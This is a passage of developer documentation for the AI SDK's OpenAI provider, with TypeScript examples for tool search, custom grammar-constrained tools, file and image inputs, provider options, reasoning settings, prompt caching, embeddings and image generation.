import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: openai.responses('gpt-5.4'),
prompt: 'What is the weather in San Francisco?',
stopWhen: stepCountIs(10),
tools: {
toolSearch: openai.tools.toolSearch(),
get_weather: tool({
description: 'Get the current weather at a specific location',
inputSchema: z.object({
location: z.string(),
unit: z.enum(['celsius', 'fahrenheit']),
}),
execute: async ({ location, unit }) => ({
location,
temperature: unit === 'celsius' ? 18 : 64,
}),
providerOptions: {
openai: { deferLoading: true },
},
}),
search_files: tool({
description: 'Search through files in the workspace',
inputSchema: z.object({ query: z.string() }),
execute: async ({ query }) => ({
results: [`Found 3 files matching "${query}"`],
}),
providerOptions: {
openai: { deferLoading: true },
},
}),
},
});
In hosted mode, the model internally searches the deferred tools, loads the relevant ones, and
proceeds to call them — all within a single response. The tool_search_call and
tool_search_output items appear in the response with execution: 'server' and call_id: null.
Client-Executed Tool Search
Use client-executed tool search when tool discovery depends on runtime state — for example,
tools that vary per tenant, project, or external system. Pass execution: 'client' along with
a description, parameters schema, and an execute callback:
import { openai } from '@ai-sdk/openai';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: openai.responses('gpt-5.4'),
prompt: 'What is the weather in San Francisco?',
stopWhen: stepCountIs(10),
tools: {
toolSearch: openai.tools.toolSearch({
execution: 'client',
description: 'Search for available tools based on what the user needs.',
parameters: {
type: 'object',
properties: {
goal: {
type: 'string',
description: 'What the user is trying to accomplish',
},
},
required: ['goal'],
additionalProperties: false,
},
execute: async ({ arguments: args }) => {
// Your custom tool discovery logic here.
// Return the tools that match the search goal.
return {
tools: [
{
type: 'function',
name: 'get_weather',
description: 'Get the current weather at a specific location',
deferLoading: true,
parameters: {
type: 'object',
properties: {
location: { type: 'string' },
},
required: ['location'],
additionalProperties: false,
},
},
],
};
},
}),
get_weather: tool({
description: 'Get the current weather at a specific location',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }) => ({
location,
temperature: 64,
condition: 'Partly cloudy',
}),
providerOptions: {
openai: { deferLoading: true },
},
}),
},
});
In client mode, the flow spans two steps:
- Step 1: The model emits a tool_search_call with execution: 'client' and a non-null call_id. The SDK calls your execute callback with the search arguments. Your callback returns the discovered tools.
- Step 2: The SDK sends the tool_search_output (with the matching call_id) back to the model. The model can now call the loaded tools as normal function calls.
For more details, see the OpenAI Tool Search documentation.
Custom Tool
The OpenAI Responses API supports custom tools through the openai.tools.customTool tool.
Custom tools return a raw string instead of JSON, optionally constrained to a grammar
(regex or Lark syntax). This makes them useful for generating structured text like
SQL queries, code snippets, or any output that must match a specific pattern.
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: openai.responses('gpt-5.2-codex'),
tools: {
write_sql: openai.tools.customTool({
name: 'write_sql',
description: 'Write a SQL SELECT query to answer the user question.',
format: {
type: 'grammar',
syntax: 'regex',
definition: 'SELECT .+',
},
execute: async input => {
// input is a raw string matching the grammar, e.g. "SELECT * FROM users WHERE age > 25"
const rows = await db.query(input);
return JSON.stringify(rows);
},
}),
},
toolChoice: 'required',
prompt: 'Write a SQL query to get all users older than 25.',
stopWhen: stepCountIs(3),
});
Custom tools also work with streamText:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai.responses('gpt-5.2-codex'),
tools: {
write_sql: openai.tools.customTool({
name: 'write_sql',
description: 'Write a SQL SELECT query to answer the user question.',
format: {
type: 'grammar',
syntax: 'regex',
definition: 'SELECT .+',
},
}),
},
toolChoice: 'required',
prompt: 'Write a SQL query to get all users older than 25.',
});
for await (const chunk of result.fullStream) {
if (chunk.type === 'tool-call') {
console.log(`Tool: ${chunk.toolName}`);
console.log(`Input: ${chunk.input}`);
}
}
The custom tool can be configured with:
- name string (required) - The name of the custom tool. Used to identify the tool in tool calls.
- description string (optional) - A description of what the tool does, to help the model understand when to use it.
- format object (optional) - The output format constraint. Omit for unconstrained text output.
  - type 'grammar' | 'text' - The format type. Use 'grammar' for constrained output or 'text' for explicit unconstrained text.
  - syntax 'regex' | 'lark' - (grammar only) The grammar syntax. Use 'regex' for regular expression patterns or 'lark' for Lark parser grammar.
  - definition string - (grammar only) The grammar definition string (a regex pattern or Lark grammar).
- execute function (optional) - An async function that receives the raw string input and returns a string result. Enables multi-turn tool calling.
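For unconstrained output, you can set format to { type: 'text' } (or omit format entirely). A minimal sketch; the tool name and behavior are illustrative:
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
  model: openai.responses('gpt-5.2-codex'),
  tools: {
    write_haiku: openai.tools.customTool({
      name: 'write_haiku',
      description: 'Write a haiku about the given topic.',
      format: { type: 'text' }, // explicit unconstrained text output
      execute: async input => {
        // input is the raw haiku text
        return `Saved haiku: ${input}`;
      },
    }),
  },
  toolChoice: 'required',
  prompt: 'Write a haiku about autumn.',
  stopWhen: stepCountIs(3),
});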
Image Inputs
The OpenAI Responses API supports image inputs for appropriate models. You can pass image files as part of the message content using the 'image' type:
const result = await generateText({
model: openai('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Please describe the image.',
},
{
type: 'image',
image: readFileSync('./data/image.png'),
},
],
},
],
});
The model will have access to the image and will respond to questions about it.
The image should be passed using the image field.
You can also pass a file-id from the OpenAI Files API.
{
type: 'image',
image: 'file-8EFBcWHsQxZV7YGezBC1fq'
}
You can also pass the URL of an image.
{
type: 'image',
image: 'https://sample.edu/image.png',
}
PDF Inputs
The OpenAI Responses API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: openai('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
You can also pass a file-id from the OpenAI Files API.
{
type: 'file',
data: 'file-8EFBcWHsQxZV7YGezBC1fq',
mediaType: 'application/pdf',
}
You can also pass the URL of a PDF.
{
type: 'file',
data: 'https://sample.edu/example.pdf',
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
}
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Structured Outputs
The OpenAI Responses API supports structured outputs. You can use generateText or streamText with Output to enforce structured outputs.
import { openai } from '@ai-sdk/openai';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: openai('gpt-4.1'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
Typed providerMetadata in Text Parts
When using the OpenAI Responses API, the SDK attaches OpenAI-specific metadata to output parts via providerMetadata.
This metadata can be used on the client side for tasks such as rendering citations or downloading files generated by the Code Interpreter. To enable type-safe handling of this metadata, the AI SDK exports dedicated TypeScript types.
For text parts, when part.type === 'text', the providerMetadata is provided in the form of OpenaiResponsesTextProviderMetadata.
This metadata includes the following fields:
- itemId - The ID of the output item in the Responses API.
- annotations (optional) - An array of annotation objects generated by the model. If no annotations are present, this property may be omitted (undefined). Each element in annotations is a discriminated union with a required type field. Supported types include, for example:
  - url_citation
  - file_citation
  - container_file_citation
  - file_path
These annotations directly correspond to the annotation objects defined by the Responses API and can be used for inline reference rendering or output analysis. For details, see the official OpenAI documentation: Responses API – output text annotations.
import {
openai,
type OpenaiResponsesTextProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4.1-mini'),
prompt:
'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
tools: {
code_interpreter: openai.tools.codeInterpreter(),
web_search: openai.tools.webSearch(),
file_search: openai.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
},
});
for (const part of result.content) {
if (part.type === 'text') {
const providerMetadata = part.providerMetadata as
| OpenaiResponsesTextProviderMetadata
| undefined;
if (!providerMetadata) continue;
const { itemId: _itemId, annotations } = providerMetadata.openai;
if (!annotations) continue;
for (const annotation of annotations) {
switch (annotation.type) {
case 'url_citation':
// url_citation is returned from web_search and provides:
// properties: type, url, title, start_index and end_index
break;
case 'file_citation':
// file_citation is returned from file_search and provides:
// properties: type, file_id, filename and index
break;
case 'container_file_citation':
// container_file_citation is returned from code_interpreter and provides:
// properties: type, container_id, file_id, filename, start_index and end_index
break;
case 'file_path':
// file_path provides:
// properties: type, file_id and index
break;
default: {
const _exhaustiveCheck: never = annotation;
throw new Error(
`Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
);
}
}
}
}
}
Typed providerMetadata in Reasoning Parts
When using the OpenAI Responses API, reasoning output parts can include provider metadata.
To handle this metadata in a type-safe way, use OpenaiResponsesReasoningProviderMetadata.
For reasoning parts, when part.type === 'reasoning', the providerMetadata is provided in the form of OpenaiResponsesReasoningProviderMetadata.
This metadata includes the following fields:
- itemId - The ID of the reasoning item in the Responses API.
- reasoningEncryptedContent (optional) - Encrypted reasoning content (only returned when requested via include: ['reasoning.encrypted_content']).
import {
openai,
type OpenaiResponsesReasoningProviderMetadata,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'How many "r"s are in the word "strawberry"?',
providerOptions: {
openai: {
store: false,
include: ['reasoning.encrypted_content'],
} satisfies OpenAILanguageModelResponsesOptions,
},
});
for (const part of result.content) {
if (part.type === 'reasoning') {
const providerMetadata = part.providerMetadata as
| OpenaiResponsesReasoningProviderMetadata
| undefined;
const { itemId, reasoningEncryptedContent } =
providerMetadata?.openai ?? {};
console.log(itemId, reasoningEncryptedContent);
}
}
Typed providerMetadata in Source Document Parts
For source document parts, when part.type === 'source' and sourceType === 'document', the providerMetadata is provided as OpenaiResponsesSourceDocumentProviderMetadata.
This metadata is also a discriminated union with a required type field. Supported types include:
- file_citation
- container_file_citation
- file_path
Each type includes the identifiers required to work with the referenced resource, such as fileId and containerId.
import {
openai,
type OpenaiResponsesSourceDocumentProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4.1-mini'),
prompt:
'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
tools: {
code_interpreter: openai.tools.codeInterpreter(),
web_search: openai.tools.webSearch(),
file_search: openai.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
},
});
for (const part of result.content) {
if (part.type === 'source') {
if (part.sourceType === 'document') {
const providerMetadata = part.providerMetadata as
| OpenaiResponsesSourceDocumentProviderMetadata
| undefined;
if (!providerMetadata) continue;
const annotation = providerMetadata.openai;
switch (annotation.type) {
case 'file_citation':
// file_citation is returned from file_search and provides:
// properties: type, fileId and index
// The filename can be accessed via part.filename.
break;
case 'container_file_citation':
// container_file_citation is returned from code_interpreter and provides:
// properties: type, containerId and fileId
// The filename can be accessed via part.filename.
break;
case 'file_path':
// file_path provides:
// properties: type, fileId and index
break;
default: {
const _exhaustiveCheck: never = annotation;
throw new Error(
`Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
);
}
}
}
}
}
Chat Models
You can create models that call the OpenAI chat API using the .chat() factory method.
The first argument is the model id, e.g. gpt-4.
The OpenAI chat models support tool calls and some have multi-modal capabilities.
const model = openai.chat('gpt-5');
OpenAI chat models also support some model-specific provider options that are not part of the standard call settings.
You can pass them in the providerOptions argument:
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
const model = openai.chat('gpt-5');
await generateText({
model,
providerOptions: {
openai: {
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
user: 'test-user', // optional unique user identifier
} satisfies OpenAILanguageModelChatOptions,
},
});
The following optional provider options are available for OpenAI chat models:
- logitBias Record<number, number> - Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase the likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the token from being generated.
- logprobs boolean | number - Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- parallelToolCalls boolean - Whether to enable parallel function calling during tool use. Defaults to true.
- user string - A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
- reasoningEffort 'minimal' | 'low' | 'medium' | 'high' | 'xhigh' - Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
- maxCompletionTokens number - Maximum number of completion tokens to generate. Useful for reasoning models.
- store boolean - Whether to enable persistence in the Responses API.
- metadata Record<string, string> - Metadata to associate with the request.
- prediction Record<string, any> - Parameters for prediction mode.
- serviceTier 'auto' | 'flex' | 'priority' | 'default' - Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported). Defaults to 'auto'.
- strictJsonSchema boolean - Whether to use strict JSON schema validation. Defaults to true.
- textVerbosity 'low' | 'medium' | 'high' - Controls the verbosity of the model's responses. Lower values will result in more concise responses, while higher values will result in more verbose responses.
- promptCacheKey string - A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
- promptCacheRetention 'in_memory' | '24h' - The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
- safetyIdentifier string - A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.
- systemMessageMode 'system' | 'developer' | 'remove' - Override the system message mode for this model. If not specified, the mode is automatically determined based on the model. system uses the 'system' role for system messages (default for most models); developer uses the 'developer' role (used by reasoning models); remove removes system messages entirely.
- forceReasoning boolean - Force treating this model as a reasoning model. This is useful for "stealth" reasoning models (e.g. via a custom baseURL) where the model ID is not recognized by the SDK's allowlist. When enabled, the SDK applies reasoning-model parameter compatibility rules and defaults systemMessageMode to developer unless overridden (see the sketch after this list).
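For example, when routing to an OpenAI-compatible endpoint that serves an unrecognized reasoning model, you might combine a custom baseURL with forceReasoning. A sketch; the base URL and model ID are illustrative:
import { createOpenAI } from '@ai-sdk/openai';
import { generateText } from 'ai';
const customProvider = createOpenAI({
  baseURL: 'https://my-gateway.example.com/v1', // illustrative gateway
  apiKey: process.env.MY_GATEWAY_API_KEY,
});
const result = await generateText({
  model: customProvider.chat('stealth-reasoning-model'), // illustrative model ID
  prompt: 'Explain the halting problem in two sentences.',
  providerOptions: {
    openai: { forceReasoning: true },
  },
});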
Reasoning
OpenAI has introduced the o1, o3, and o4 series of reasoning models.
Currently, o4-mini, o3, o3-mini, and o1 are available via both the chat and responses APIs. The
model gpt-5.1-codex-mini is available only via the responses API.
Reasoning models currently only generate text, have several limitations, and are only supported using generateText and streamText.
They support additional settings and response metadata:
- You can use providerOptions to set the reasoningEffort option (or alternatively the reasoningEffort model setting), which determines the amount of reasoning the model performs.
- You can use the response providerMetadata to access the number of reasoning tokens that the model generated.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5'),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
openai: {
reasoningEffort: 'low',
} satisfies OpenAILanguageModelChatOptions,
},
});
console.log(text);
console.log('Usage:', {
...usage,
reasoningTokens: providerMetadata?.openai?.reasoningTokens,
});
- You can control how system messages are handled with the systemMessageMode provider option:
  - developer: treat the prompt as a developer message (default for reasoning models).
  - system: keep the system message as a system-level instruction.
  - remove: remove the system message from the messages.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{ role: 'system', content: 'You are a helpful assistant.' },
{ role: 'user', content: 'Tell me a joke.' },
],
providerOptions: {
openai: {
systemMessageMode: 'system',
} satisfies OpenAILanguageModelChatOptions,
},
});
Strict Structured Outputs
Strict structured outputs are enabled by default.
You can disable them by setting the strictJsonSchema option to false.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: openai.chat('gpt-4o-2024-08-06'),
providerOptions: {
openai: {
strictJsonSchema: false,
} satisfies OpenAILanguageModelChatOptions,
},
output: Output.object({
schema: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
schemaName: 'recipe',
schemaDescription: 'A recipe for lasagna.',
}),
prompt: 'Generate a lasagna recipe.',
});
console.log(JSON.stringify(result.output, null, 2));
Strict mode restricts which JSON Schema features you can use. For example, optional schema properties are not supported: you need to change Zod .nullish() and .optional() to .nullable().
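For example:
import { z } from 'zod';
// Not supported with strict JSON schema validation:
const unsupported = z.object({ note: z.string().optional() });
// Supported - make the property nullable instead:
const supported = z.object({ note: z.string().nullable() });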
Logprobs
OpenAI provides logprobs information for completion/chat models.
You can access it in the providerMetadata object.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.chat('gpt-5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
openai: {
// this can also be a number,
// refer to logprobs provider options section for more
logprobs: true,
} satisfies OpenAILanguageModelChatOptions,
},
});
const openaiMetadata = result.providerMetadata?.openai;
const logprobs = openaiMetadata?.logprobs;
Image Support
The OpenAI Chat API supports image inputs for appropriate models. You can pass image files as part of the message content using the 'image' type:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Please describe the image.',
},
{
type: 'image',
image: readFileSync('./data/image.png'),
},
],
},
],
});
The model will have access to the image and will respond to questions about it.
The image should be passed using the image field.
You can also pass the URL of an image.
{
type: 'image',
image: 'https://sample.edu/image.png',
}
PDF support
The OpenAI Chat API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
You can also pass a file-id from the OpenAI Files API.
{
type: 'file',
data: 'file-8EFBcWHsQxZV7YGezBC1fq',
mediaType: 'application/pdf',
}
You can also pass the URL of a PDF.
{
type: 'file',
data: 'https://sample.edu/example.pdf',
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
}
Predicted Outputs
OpenAI supports predicted outputs for gpt-4o and gpt-4o-mini.
Predicted outputs help you reduce latency by allowing you to specify a base text that the model should modify.
You can enable predicted outputs by adding the prediction option to the providerOptions.openai object:
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { streamText } from 'ai';
const existingCode = '...'; // the code to modify
const result = streamText({
  model: openai.chat('gpt-4o'),
messages: [
{
role: 'user',
content: 'Replace the Username property with an Email property.',
},
{
role: 'user',
content: existingCode,
},
],
providerOptions: {
openai: {
prediction: {
type: 'content',
content: existingCode,
},
} satisfies OpenAILanguageModelChatOptions,
},
});
OpenAI provides usage information for predicted outputs (acceptedPredictionTokens and rejectedPredictionTokens).
You can access it in the providerMetadata object.
const openaiMetadata = (await result.providerMetadata)?.openai;
const acceptedPredictionTokens = openaiMetadata?.acceptedPredictionTokens;
const rejectedPredictionTokens = openaiMetadata?.rejectedPredictionTokens;
Image Detail
You can use the openai provider option to set the image input detail to high, low, or auto:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe the image in detail.' },
{
type: 'image',
image:
'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/comic-cat.png?raw=true',
// OpenAI specific options - image detail:
providerOptions: {
openai: { imageDetail: 'low' },
},
},
],
},
],
});
Distillation
OpenAI supports model distillation for some models.
If you want to store a generation for use in the distillation process, you can add the store option to the providerOptions.openai object.
This will save the generation to the OpenAI platform for later use in distillation.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
import 'dotenv/config';
async function main() {
const { text, usage } = await generateText({
model: openai.chat('gpt-4o-mini'),
prompt: 'Who worked on the original macintosh?',
providerOptions: {
openai: {
store: true,
metadata: {
custom: 'value',
},
} satisfies OpenAILanguageModelChatOptions,
},
});
console.log(text);
console.log();
console.log('Usage:', usage);
}
main().catch(console.error);
Prompt Caching
OpenAI has introduced Prompt Caching for supported models
including gpt-4o and gpt-4o-mini.
- Prompt caching is automatically enabled for these models when the prompt is 1024 tokens or longer. It does not need to be explicitly enabled.
- You can use the response providerMetadata to access the number of prompt tokens that were a cache hit.
- Note that caching behavior depends on load on OpenAI's infrastructure. Prompt prefixes generally remain in the cache for 5-10 minutes of inactivity before they are evicted, but during off-peak periods they may persist for up to an hour.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-4o-mini'),
prompt: `A 1024-token or longer prompt...`,
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
To improve cache hit rates, you can manually control caching using the promptCacheKey option:
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5'),
prompt: `A 1024-token or longer prompt...`,
providerOptions: {
openai: {
promptCacheKey: 'my-custom-cache-key-123',
} satisfies OpenAILanguageModelChatOptions,
},
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
For GPT-5.1 models, you can enable extended prompt caching that keeps cached prefixes active for up to 24 hours:
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5.1'),
prompt: `A 1024-token or longer prompt...`,
providerOptions: {
openai: {
promptCacheKey: 'my-custom-cache-key-123',
promptCacheRetention: '24h', // Extended caching for GPT-5.1
} satisfies OpenAILanguageModelChatOptions,
},
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
Audio Input
With the gpt-4o-audio-preview model, you can pass audio files to the model.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.chat('gpt-4o-audio-preview'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What is the audio saying?' },
{
type: 'file',
mediaType: 'audio/mpeg',
data: readFileSync('./data/galileo.mp3'),
},
],
},
],
});
Completion Models
You can create models that call the OpenAI completions API using the .completion() factory method.
The first argument is the model id.
Currently only gpt-3.5-turbo-instruct is supported.
const model = openai.completion('gpt-3.5-turbo-instruct');
OpenAI completion models also support some model-specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:
import { openai, type OpenAILanguageModelCompletionOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
  model: openai.completion('gpt-3.5-turbo-instruct'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    openai: {
      echo: true, // optional, echo the prompt in addition to the completion
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      suffix: 'some text', // optional suffix that comes after a completion of inserted text
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelCompletionOptions,
  },
});
The following optional provider options are available for OpenAI completion models:
- echo boolean - Echo back the prompt in addition to the completion.
- logitBias Record<number, number> - Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase the likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs boolean | number - Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- suffix string - The suffix that comes after a completion of inserted text.
- user string - A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Model Capabilities
| Model | Image Input | Audio Input | Object Generation | Tool Usage |
|---|---|---|---|---|
| gpt-5.4-pro | | | | |
| gpt-5.4 | | | | |
| gpt-5.4-mini | | | | |
| gpt-5.4-nano | | | | |
| gpt-5.3-chat-latest | | | | |
| gpt-5.2-pro | | | | |
| gpt-5.2-chat-latest | | | | |
| gpt-5.2 | | | | |
| gpt-5.1-codex-mini | | | | |
| gpt-5.1-codex | | | | |
| gpt-5.1-chat-latest | | | | |
| gpt-5.1 | | | | |
| gpt-5-pro | | | | |
| gpt-5 | | | | |
| gpt-5-mini | | | | |
| gpt-5-nano | | | | |
| gpt-5-codex | | | | |
| gpt-5-chat-latest | | | | |
| gpt-4.1 | | | | |
| gpt-4.1-mini | | | | |
| gpt-4.1-nano | | | | |
| gpt-4o | | | | |
| gpt-4o-mini | | | | |
Embedding Models
You can create models that call the OpenAI embeddings API
using the .embedding() factory method.
const model = openai.embedding('text-embedding-3-large');
OpenAI embedding models support several additional provider options. You can pass them as an options argument:
import { openai, type OpenAIEmbeddingModelOptions } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: openai.embedding('text-embedding-3-large'),
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // optional, number of dimensions for the embedding
user: 'test-user', // optional unique user identifier
} satisfies OpenAIEmbeddingModelOptions,
},
});
The following optional provider options are available for OpenAI embedding models:
- dimensions number - The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
- user string - A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| text-embedding-3-large | 3072 | ✓ |
| text-embedding-3-small | 1536 | ✓ |
| text-embedding-ada-002 | 1536 | ✗ |
Image Models
You can create models that call the OpenAI image generation API
using the .image() factory method.
const model = openai.image('dall-e-3');
Image Editing
OpenAI's gpt-image-1 model supports powerful image editing capabilities. Pass input images via prompt.images to transform, combine, or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: {
text: 'Turn the cat into a dog but retain the style of the original image',
images: [imageBuffer],
},
});
Inpainting with Mask
Edit specific parts of an image using a mask. Transparent areas in the mask indicate where the image should be edited:
const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // Transparent areas = edit regions
const { images } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask: mask,
},
});
Background Removal
Remove the background from an image by setting background to transparent:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: {
text: 'do not change anything',
images: [imageBuffer],
},
providerOptions: {
openai: {
background: 'transparent',
output_format: 'png',
},
},
});
Multi-Image Combining
Combine multiple reference images into a single output. gpt-image-1 supports up to 16 input images:
const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');
const owl = readFileSync('./owl.png');
const bear = readFileSync('./bear.png');
const { images } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: {
text: 'Combine these animals into a group photo, retaining the original style',
images: [cat, dog, owl, bear],
},
});
Model Capabilities
| Model | Sizes |
|---|---|
| gpt-image-1.5 | 1024x1024, 1536x1024, 1024x1536 |
| gpt-image-1-mini | 1024x1024, 1536x1024, 1024x1536 |
| gpt-image-1 | 1024x1024, 1536x1024, 1024x1536 |
| dall-e-3 | 1024x1024, 1792x1024, 1024x1792 |
| dall-e-2 | 256x256, 512x512, 1024x1024 |
You can pass optional providerOptions to the image model. These are subject to change by OpenAI and are model-dependent. For example, the gpt-image-1 model supports the quality option:
const { image, providerMetadata } = await generateImage({
model: openai.image('gpt-image-1.5'),
prompt: 'A salamander at sunrise in a forest pond in the Seychelles.',
providerOptions: {
openai: { quality: 'high' },
},
});
For more on generateImage() see Image Generation.
OpenAI's image models return additional metadata in the response that can be
accessed via providerMetadata.openai. The following OpenAI-specific metadata
is available:
- images Array<object> - Array of image-specific metadata. Each image object may contain:
  - revisedPrompt string - The revised prompt that was actually used to generate the image (OpenAI may modify your prompt for safety or clarity)
  - created number - The Unix timestamp (in seconds) of when the image was created
  - size string - The size of the generated image. One of 1024x1024, 1024x1536, or 1536x1024
  - quality string - The quality of the generated image. One of low, medium, or high
  - background string - The background parameter used for the image generation. Either transparent or opaque
  - outputFormat string - The output format of the generated image. One of png, webp, or jpeg
